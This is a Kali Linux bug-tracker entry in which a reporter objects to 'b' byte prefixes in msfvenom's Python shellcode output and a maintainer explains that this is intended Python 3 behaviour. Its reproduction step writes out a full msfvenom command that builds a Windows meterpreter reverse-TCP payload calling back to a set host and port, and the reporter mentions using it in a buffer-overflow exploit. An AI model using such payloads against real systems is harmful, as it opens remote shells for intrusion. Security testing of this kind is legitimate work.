| ID | Project | Category | View Status | Date Submitted | Last Update |
|---|---|---|---|---|---|
| 0006107 | Kali Linux | Kali Package Bug | public | 2020-02-17 15:45 | 2020-02-18 14:24 |
| Reporter | JasonGreene | Assigned To | rhertzog | ||
| Priority | high | Severity | major | Reproducibility | always |
| Status | closed | Resolution | no change required | ||
| Product Version | 2020.1 | ||||
| Summary | 0006107: "b" Characters in Msvenom Output | ||||
| Description | When using the msfvenom command to generate shellcode, there's a "b" character at the beginning of each line as demonstrated in the attached screenshot. These need to be removed in order for the shellcode to function. For example (note the b after buf+=): buf += b"\xd9\xc3\ | ||||
| Steps To Reproduce | msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 LHOST=192.168.56.135 LPORT=4444 -f python -b '\x00\x22\x0d\x0a\x0b' | ||||
 |
Can you elaborate why? A shell code is binary data and using the "bytes" type in Python is the correct thing to do. The switch to Python 3 might require you to adjust your code to handle that type of data. But this change is not recent in metasploit, it dates back to August 2019 and nobody complained so far. |
 |
rhertzog, My apologies. If that behavior is expected from msfvenom, it's new to me as I've been using a previous version of Kali for the past several years. In one particular scenario for a buffer overflow I was exploiting, the new output did not function as intended until I stripped off the "b" characters. |
